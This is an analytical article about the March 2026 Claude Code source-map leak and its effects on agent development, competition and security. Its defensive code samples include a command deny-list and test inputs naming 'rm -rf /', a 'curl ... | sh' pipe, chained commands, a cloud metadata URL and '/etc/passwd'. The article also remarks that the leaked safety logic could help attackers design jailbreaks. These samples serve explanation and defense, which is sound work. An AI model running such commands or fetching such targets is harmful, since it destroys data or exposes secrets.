AI's First 'Nuclear Leak' Incident

04/01 2026

On March 30, 2026, an elementary mistake by Anthropic inadvertently dropped a boulder into the long river of AI development. The ripples are still spreading, and their final form remains difficult to predict. What is certain, however, is that we are standing at the dawn of a new era.

Anthropic, a star AI company known for its 'safety-first' ethos and valued at $350 billion, inadvertently 'open-sourced' one of its core products to developers worldwide, in the most unlikely way, just as it was preparing for its highly anticipated IPO:



The complete source code of Claude Code, more than 512,000 lines of TypeScript including unreleased cutting-edge features, internal architectural logic, and even engineers' handwritten notes, was exposed overnight on the public internet.

Figure: Panoramic view of the leaked content

The nature of this incident far exceeds ordinary data leaks or code thefts. What was exposed is a battle-tested 'blueprint' and 'construction manual' representing the world's highest standard of AI Agent engineering implementation. This is akin to a country accidentally making public the complete engineering drawings of its most advanced nuclear warhead in the nuclear age.

Calling this 'AI's first nuclear leak' is not alarmist. Its potential impacts are profound and complex:

● First, the most advanced AI programming capabilities will create an 'egalitarian effect,' catalyzing a Cambrian explosion in the global Agent ecosystem;

● Second, the core capability gap between leading global large models will be significantly narrowed, reshaping the AI competition landscape in China, the U.S., and globally;

● Third, this overly advanced technological blueprint falling into malicious hands could introduce previously unimaginable security risks.

This article will analyze these three levels of impact in sequence.

01

Incident Reconstruction: A .map File That Caused 'Exposure'

The technical cause of the incident is almost absurdly simple.

On March 30, 2026, Anthropic released version 2.1.88 of the Claude Code command-line tool via npm. However, this release package accidentally included a 59.8 MB cli.js.map file.

Source map files are debugging tools used during development that precisely map compiled, minified JavaScript code back to human-readable original TypeScript source code.

With this file shipped in a public npm package, the entire source code of Claude Code, more than 1,900 source files totaling 512,000 lines, was effectively laid bare for anyone to read.

Even more critically, the map file referenced unobfuscated TypeScript source files hosted in Anthropic's R2 storage bucket, making the entire src/ directory directly downloadable.
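To make the mechanism concrete: a source map in the widely used v3 format is plain JSON. Its `sources` array lists the original file paths, and the optional `sourcesContent` array can embed each file's full original text; entries without embedded text are only referenced by path or URL, which is how a map can point readers to files stored elsewhere. The sketch below is a hypothetical helper (`recoverSources` is an illustrative name, not a real library function) that separates the two cases; it assumes a map without `sourceRoot` and does not decode `mappings`.

```typescript
// Minimal shape of a Source Map v3 file (only the fields relevant here).
interface SourceMapV3 {
  version: number;
  file?: string;
  sources: string[];
  sourcesContent?: (string | null)[];
  names: string[];
  mappings: string;
}

interface RecoveredSources {
  embedded: Map<string, string>; // original path -> full original source text
  referencedOnly: string[]; // paths listed without embedded text
}

// Hypothetical helper: splits `sources` into files whose text is embedded in
// `sourcesContent` and files that are only referenced by path or URL.
// `sourceRoot` handling and `mappings` decoding are deliberately omitted.
function recoverSources(mapJson: string): RecoveredSources {
  const map = JSON.parse(mapJson) as SourceMapV3;
  if (map.version !== 3) {
    throw new Error(`unsupported source map version: ${map.version}`);
  }
  const embedded = new Map<string, string>();
  const referencedOnly: string[] = [];
  map.sources.forEach((source, i) => {
    const content = map.sourcesContent?.[i];
    if (typeof content === "string") {
      embedded.set(source, content);
    } else {
      referencedOnly.push(source);
    }
  });
  return { embedded, referencedOnly };
}

// Usage with a tiny hand-written map (hypothetical file names and contents).
const exampleMap = JSON.stringify({
  version: 3,
  file: "cli.js",
  sources: ["src/main.ts", "src/tools.ts"],
  sourcesContent: ["export const answer: number = 42;\n", null],
  names: [],
  mappings: "AAAA",
});
const recovered = recoverSources(exampleMap);
console.log(Array.from(recovered.embedded.keys())); // [ 'src/main.ts' ]
console.log(recovered.referencedOnly); // [ 'src/tools.ts' ]
```

Either way, whoever holds the map can reconstruct the original file tree: embedded files directly, referenced files by following their paths.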

Security researcher Chaofan Shou was the first to disclose the finding publicly, on X. Within hours, backup repositories on GitHub were being forked en masse, with star counts quickly passing 5,000, while the story simultaneously shot to the top of Hacker News and Reddit.

This was neither an 'active open-sourcing' performance art nor an external hacker attack.

Anthropic responded quickly, describing it as a 'release packaging issue caused by human error' and emphasizing that 'no sensitive customer data or credential information was involved or leaked.' In short, this was a systemic failure of engineering operations: a low-level configuration oversight in the build pipeline produced the largest 'technical leak' in AI to date.
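A guard against this class of packaging mistake can be very small. npm's usual first line of defense is an allowlist in the `files` field of package.json; a CI check before publishing is a second. The sketch below is hypothetical (not Anthropic's tooling): it assumes the list of packaged paths is taken from the `path` fields of the `files` array printed by `npm pack --dry-run --json`, and the function name and blocked patterns are illustrative choices.

```typescript
// Patterns that should never ship in a public package (illustrative list).
const FORBIDDEN_PATTERNS: RegExp[] = [
  /\.map$/, // source maps can embed or point to the original source
  /(^|\/)\.env(\..*)?$/, // local environment files that may hold secrets
];

// Returns every packaged path that matches a forbidden pattern.
function findForbiddenFiles(packagedPaths: string[]): string[] {
  return packagedPaths.filter((p) => FORBIDDEN_PATTERNS.some((re) => re.test(p)));
}

// Usage: stop the release if anything forbidden would be published.
const packagedPaths = ["package.json", "README.md", "cli.js", "cli.js.map"];
const offenders = findForbiddenFiles(packagedPaths);
if (offenders.length > 0) {
  console.error(`Refusing to publish: ${offenders.join(", ")}`);
}
```

In a real pipeline the non-empty case would fail the job instead of just logging.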

Notably, this marked Anthropic's second security incident within a week.

Five days earlier, a content management system configuration error had made approximately 3,000 unreleased internal assets (including drafts related to the Claude Mythos model) publicly accessible. Such repeated failures of basic operations stand in stark contrast to the company's cutting-edge investment in model security research.

02

Three-Dimensional Impacts

1. Egalitarian Opportunity: The Agent Ecosystem Approaches a 'Cambrian Explosion'

Coding capability is the most critical foundational technology for Agents, and the most immediate beneficiaries of this leak are AI developers worldwide. As a closed-source benchmark product, Claude Code was previously a 'black box' to outsiders: developers knew it was powerful but not why. Now its 'factory development manual' lies open before everyone.

The leaked code reveals an engineering system far more complex than expected. Its core modules include permission control and sandbox mechanisms, context management and truncation strategies, tool invocation loops and error recovery, multi-model collaboration and routing logic, and telemetry and performance monitoring systems, among others.

This means that engineering problems in Agent development that once took months or even years of trial and error to work out now all have clear reference points: how to safely grant a model read/write access to local files, how to handle context truncation and memory management, how to design a stable and reliable tool invocation loop. The knowledge threshold for Agent development has been compressed overnight.
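For readers unfamiliar with the pattern, a tool invocation loop with basic error recovery and context truncation can be sketched in a few dozen lines. This is a generic illustration, not Claude Code's implementation: the `Model` and `Tool` types, the `runAgent` and `truncate` helpers, and the `read_file` tool are all hypothetical, and message length in characters stands in for a real token count.

```typescript
type Role = "system" | "user" | "assistant" | "tool";
interface Message {
  role: Role;
  content: string;
}

// A model turn either answers in plain text or requests a single tool call.
type ModelReply =
  | { kind: "final"; text: string }
  | { kind: "tool_call"; tool: string; input: string };
type Model = (history: Message[]) => ModelReply;
type Tool = (input: string) => string;

// Keeps system messages and drops the oldest other messages until the total
// length fits the budget. Characters stand in for tokens in this sketch.
function truncate(history: Message[], maxChars: number): Message[] {
  const system = history.filter((m) => m.role === "system");
  const rest = history.filter((m) => m.role !== "system");
  const size = (ms: Message[]) => ms.reduce((n, m) => n + m.content.length, 0);
  while (rest.length > 1 && size(system) + size(rest) > maxChars) {
    rest.shift(); // always keep at least the most recent message
  }
  return [...system, ...rest];
}

// Runs model -> tool -> model turns until the model answers or the step
// limit is hit. Tool failures are fed back to the model as text.
function runAgent(
  model: Model,
  tools: Record<string, Tool>,
  task: string,
  maxSteps = 8,
  maxChars = 4000,
): string {
  let history: Message[] = [
    { role: "system", content: "You are a coding agent." },
    { role: "user", content: task },
  ];
  for (let step = 0; step < maxSteps; step++) {
    history = truncate(history, maxChars);
    const reply = model(history);
    if (reply.kind === "final") return reply.text;
    history.push({ role: "assistant", content: `${reply.tool}(${reply.input})` });
    const tool: Tool | undefined = tools[reply.tool];
    let result: string;
    try {
      result = tool ? tool(reply.input) : `error: unknown tool "${reply.tool}"`;
    } catch (err) {
      // Error recovery: report the failure instead of aborting the loop.
      result = `error: ${err instanceof Error ? err.message : String(err)}`;
    }
    history.push({ role: "tool", content: result });
  }
  return "stopped: step limit reached";
}

// Usage with a scripted stand-in model and a hypothetical `read_file` tool.
const script: ModelReply[] = [
  { kind: "tool_call", tool: "read_file", input: "missing.txt" }, // fails
  { kind: "tool_call", tool: "read_file", input: "notes.txt" }, // retry succeeds
  { kind: "final", text: "notes.txt says: hello" },
];
let turn = 0;
const scriptedModel: Model = () => script[turn++];
const fakeFiles: Record<string, string> = { "notes.txt": "hello" };
const answer = runAgent(
  scriptedModel,
  {
    read_file: (path) => {
      if (!(path in fakeFiles)) throw new Error(`no such file: ${path}`);
      return fakeFiles[path];
    },
  },
  "Summarize notes.txt",
);
console.log(answer); // notes.txt says: hello
```

Production systems add much more (real token counting, summarization instead of dropping, sandboxed tools), but the control flow of call, execute, report back, and bound the loop is the part this sketch illustrates.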

It is foreseeable that in the coming months, Agents built on or inspired by Claude Code's architecture will emerge in large numbers. Whether open-source clones or commercial improvements, all will benefit directly from this 'design blueprint dropped from the sky.' A new wave of innovation, standing on the shoulders of giants, is bound to follow.

The 'Cambrian explosion' of Agents has thus been accidentally ignited.

2. Landscape Reshaping: Global Large Model Competition Enters the 'Post-Leak Era'

One of the key directions of large model capability progress over the past year has been coding ability. Code generation, understanding, debugging, and automated execution have become core metrics for measuring a model's 'intelligence' and 'practicality.'

Claude Code became a phenomenal product precisely because it seamlessly combined the Claude models' powerful coding capabilities with a well-engineered Agent framework.

While this leak did not expose the Claude model weights themselves, it revealed the 'methodology' for getting the most out of the model. For competitors, this helps in several ways: best practices in Agent engineering can be reused directly; bottlenecks in model capability become clear directions for breakthroughs; and technical routes and R&D schedules can be calibrated accordingly.

As one industry insider bluntly put it: 'Okay, every major model company, start referencing this immediately.' This is no joke.

The leaked source code even included unreleased Anthropic model codenames (such as Capybara/Claude 4.6 and Fennec/Opus 4.6) along with their performance metrics (e.g., a false positive rate of 29-30% for the v8 version versus 16.7% for v4).

This information holds extremely high intelligence value for competitors to understand Anthropic's technical roadmap and R&D progress.

Therefore, this leak will significantly narrow the 'Agent application layer' capability gap among global mainstream large models.

Models that gained attention mainly through 'internet celebrity' buzz or a single standout feature may no longer hold a secure advantage. Genuinely capable 'rising stars' with strong engineering execution are poised to seize this opportunity and break out.

The focus of AI competition, in China, the U.S., and globally, will shift faster away from the single dimension of model parameter scale and toward deep integration of model capabilities with engineered systems.

3. Hidden Dangers: Who Opened Pandora's Box?

Technology is neutral, but those who wield it are not. The most worrying aspect of the Claude Code source leak is not that it gives 'good actors' a chance to catch up, but that it may already be in the hands of 'bad actors.'

First, security barriers are systematically deconstructed.

Claude Code inevitably includes a series of safety mechanisms, such as permission controls that stop the model from executing dangerous commands, filtering of sensitive information, and logic for refusing harmful requests. The source code of these mechanisms is now fully exposed.

Malicious actors can meticulously analyze the weaknesses of these 'barriers' and design specialized jailbreak prompts or attack paths that precisely bypass Anthropic's carefully built defenses. It is as if the design drawings of a nuclear power plant's security system had been made public, letting terrorists plan the most precise infiltration routes.
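To illustrate what a 'permission control that stops dangerous commands' can look like, and why publishing one matters, here is a hypothetical gate that sorts shell commands into allow, ask, and deny. The rules, names, and patterns are invented for illustration and are not Claude Code's actual policy. Once rules like these are public, an attacker knows exactly which inputs fall through to `allow`.

```typescript
type Decision = "allow" | "ask" | "deny";

// Illustrative policy only: read-only commands run freely, clearly destructive
// patterns are refused, and everything else needs the user's confirmation.
const ALLOW_PREFIXES = ["ls", "pwd", "git status", "git diff", "git log"];
const DENY_PATTERNS: RegExp[] = [
  /\brm\s+-\w*(rf|fr)/, // recursive forced delete, e.g. rm -rf
  /\bcurl\b[^|]*\|\s*(sh|bash)\b/, // piping a download straight into a shell
  /\bsudo\b/, // privilege escalation
];
// Shell metacharacters that could chain or redirect an otherwise allowed command.
const SHELL_OPERATORS = /[;&|`$<>]/;

function classifyCommand(command: string): Decision {
  const cmd = command.trim();
  if (DENY_PATTERNS.some((re) => re.test(cmd))) return "deny";
  if (SHELL_OPERATORS.test(cmd)) return "ask";
  const allowed = ALLOW_PREFIXES.some((p) => cmd === p || cmd.startsWith(p + " "));
  return allowed ? "allow" : "ask";
}

// Usage: print the decision for a few sample commands.
for (const c of [
  "ls -la",
  "npm install",
  "ls; rm notes.txt",
  "rm -rf /",
  "curl https://example.com/x.sh | sh",
]) {
  console.log(`${classifyCommand(c)}\t${c}`);
}
```

The shell-operator check is the kind of detail an attacker would probe first: without it, `ls; rm notes.txt` would pass as an allowed `ls`.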

Second, attack vectors are directly revealed. Researchers point out that the leaked code may expose potential attack vectors such as Server-Side Request Forgery (SSRF), providing entry points for subsequent cyberattacks. Attackers can audit every API call, every file read/write operation in the code, searching for possible logical vulnerabilities or privilege abuse opportunities.
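SSRF arises when a tool that fetches URLs on the model's behalf can be steered toward internal addresses, such as localhost services or cloud metadata endpoints. Auditors of leaked code look for whether checks like the one below exist and where they fall short. The sketch is hypothetical (the function names are illustrative and nothing here is taken from the leaked code); it inspects only the URL itself, so a real defense must also validate the addresses a hostname resolves to and every redirect target.

```typescript
import { isIP } from "node:net";

// True for IPv4 literals in loopback, private, link-local or "this network" ranges.
function isPrivateIPv4(ip: string): boolean {
  const [a, b] = ip.split(".").map(Number);
  return (
    a === 0 ||
    a === 10 ||
    a === 127 ||
    (a === 169 && b === 254) || // link-local, incl. cloud metadata at 169.254.169.254
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168)
  );
}

// Hypothetical check for a URL-fetching tool: refuse targets that point back
// into the local machine or private network.
function isSafeFetchTarget(raw: string): boolean {
  let url: URL;
  try {
    url = new URL(raw);
  } catch {
    return false; // not a valid absolute URL
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;
  const host = url.hostname.replace(/^\[|\]$/g, ""); // IPv6 literals keep brackets
  if (host === "localhost" || host.endsWith(".localhost")) return false;
  const family = isIP(host);
  if (family === 4) return !isPrivateIPv4(host);
  if (family === 6) return false; // this sketch simply refuses IPv6 literals
  // A plain hostname passes here, but a real guard must also check the
  // addresses it resolves to (DNS rebinding) and every redirect target.
  return true;
}

// Usage: a few allowed and refused targets.
for (const u of [
  "https://example.com/docs",
  "http://169.254.169.254/latest/meta-data/",
  "http://localhost:3000/",
  "file:///etc/passwd",
]) {
  console.log(isSafeFetchTarget(u), u);
}
```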

Third, risks of malicious cloning and supply chain poisoning. The leaked code has been archived by multiple parties and has begun circulating in developer communities. While Anthropic retains legal protection through its intellectual property rights, in practice it is nearly impossible to stop the code from spreading worldwide or being built upon.

We have already observed that, even before the leak, malicious actors were buying ads on keywords such as 'Claude Code download' to lure developers into installing information-stealing malware. Now that the real source code is public, attackers can easily create 'evil-tweaked' versions of Claude Code with backdoors and distribute them disguised as official or optimized builds, infiltrating countless developers' work environments. Once such maliciously modified Agents enter corporate intranets, the consequences would be unthinkable.
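One basic defense against tampered redistributions is to install only from the official registry and verify integrity hashes. npm records a Subresource Integrity string of the form `sha512-<base64>` for each package, in the `integrity` field of package-lock.json and in the registry's `dist.integrity` metadata. The hypothetical helpers below recompute such a string for a tarball and compare it; note that a hash only proves the bytes match what was published, so it cannot help a developer who deliberately installs a look-alike 'optimized' fork from elsewhere.

```typescript
import { createHash } from "node:crypto";

// Builds an npm-style integrity string: "sha512-" + base64 SHA-512 digest.
function sriSha512(data: Uint8Array): string {
  return "sha512-" + createHash("sha512").update(data).digest("base64");
}

// Accepts a downloaded package tarball only if it hashes to the integrity
// value published by the official registry.
function verifyIntegrity(tarball: Uint8Array, expectedIntegrity: string): boolean {
  return sriSha512(tarball) === expectedIntegrity.trim();
}

// Usage with stand-in bytes; a real check would hash the actual .tgz file.
const official = new TextEncoder().encode("official package bytes");
const expected = sriSha512(official);
const tampered = new TextEncoder().encode("official package bytes + backdoor");
console.log(verifyIntegrity(official, expected)); // true
console.log(verifyIntegrity(tampered, expected)); // false
```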

Because this level of impact is hard for the public to perceive directly, it is often the most underestimated.

Yet precisely this layer constitutes the true, long-term threat in this 'nuclear leak' incident. The more advanced the technology, the more severe the consequences of its misuse.

03

Conclusion

In this era, the technological barriers to Agents have been accidentally dismantled. Agent development is no longer the preserve of a few giants, and the global developer community is about to witness an unprecedented wave of innovation.

In this era, the global AI competition landscape has been reshaped by an external shock. 'Engineering' capability has been elevated to unprecedented importance, and the competition will become more diversified and more intense.

In this era, the risks of technology as a double-edged sword have been starkly revealed. When the inner workings of the most advanced AI systems become open secrets, how do we ensure they are used for creation rather than destruction? This is no longer a security challenge for Anthropic alone but a question the entire industry, and indeed society as a whole, must confront together.

Years from now, looking back at this 'AI's first nuclear leak' incident, it may be seen as a major turning point. While we feel excitement for the impending innovation boom, we must also maintain clarity and vigilance against the risks lurking in the shadows. After all, Pandora's box, once opened, cannot be closed again.